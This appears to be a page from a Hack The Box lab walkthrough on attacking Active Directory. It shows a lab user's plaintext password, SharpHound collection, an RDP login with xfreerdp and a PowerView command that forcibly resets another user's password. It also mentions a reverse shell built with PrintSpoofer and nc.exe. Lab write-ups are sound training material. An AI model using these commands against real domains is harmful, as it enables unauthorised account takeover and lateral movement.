Active Directory

We previously got a pair of credentials for a user in the AD environment hporter:Gr8hambino!.

First we need SharpHound of course.

Once done we use the same reverse shell we got previously using PrintSpoofer and nc.exe to run SharpHound

SharpHound.exe -c All

This will generate a zip file that we can download now and feed it into bloodhound. {HTB VM was about to die so here it is: https://gofile.io/d/5keY9m}

Starting bloodhound

sudo neo4j start
bloodhound

Our hporter user has the right to change password for the user ssmalls.

And our user has the right to RDP into DEV01. So we can now use PowerView to change the users password.

xfreerdp /v:172.16.8.20 /u:hporter /p:Gr8hambino! /drive:share

We only get terminal access. We can check for the location of our share:

So I downloaded PowerView.ps1 and copied it to our current location on Windows from the share.

copy \\TSCLIENT\share\PowerView.ps1 .

Changing other users password:

Import-Module .\PowerView.ps1
Set-DomainUserPassword -Identity ssmalls -AccountPassword (ConvertTo-SecureString 'ezpwned' -AsPlainText -Force ) -Verbose

PreviousExploiting DNN NextShares Hunting

Last updated 10 months ago